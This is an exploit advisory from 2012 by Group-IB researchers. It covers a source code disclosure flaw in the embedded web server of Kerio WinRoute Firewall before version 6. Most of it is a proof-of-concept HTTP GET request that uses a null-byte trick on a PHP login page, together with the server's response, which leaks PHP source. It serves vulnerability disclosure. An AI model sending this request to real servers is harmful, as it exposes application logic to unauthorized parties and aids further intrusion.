Kerio WinRoute Firewall Source Code Disclosure

`# Exploit Title: Kerio WinRoute Firewall Embedded Web ServerVersion: Source Code Disclosure  
# Google Dork:  
# Date: 10.05.2012  
# Author: Eugene Salov, Andrey Komarov (Group-IB, http://group-ib.ru)  
# Software Link: http://winroute.ru/kerio_winroute_firewall.htm  
# Version: prior to 6  
# Tested on: Microsoft Windows  
# CVE :  
  
Source code disclosure attacks on Kerio Web Server allow a malicious user  
to obtain the source code of a server-side application.  
This vulnerability grants the attacker deeper knowledge of the Web  
application logic.  
  
POC:  
GET /nonauth/login.phpNULL_BYTE.txt HTTP/1.1  
User-Agent: Group-IB OAiK Fuzzer  
Host: hostname  
  
HTTP/1.1 200 OK  
Connection: Close  
Content-Length: 2410  
Content-Type: text/plain  
Date: Fri, 27 Apr 2012 13:42:27 GMT  
Last-Modified: Wed, 15 Oct 2008 03:14:06 GMT  
Server: Kerio WinRoute Firewall Embedded Web Server  
  
<?php  
require_once('configNonauth.inc');  
require_once(CORE_PATH . 'langHeader.inc');  
require_once(LIB_PATH . 'Page.inc');  
require_once(LIB_PATH . 'HtmlElements.inc');  
require_once(CORE_PATH . 'common.inc');  
require_once(CORE_PATH . 'browser.inc');  
$afg = '';  
$jy = kerio("webiface::PhpNonAuth");  
$jy->getAsocUserName(&$afg, &$aba);  
.....  
  
`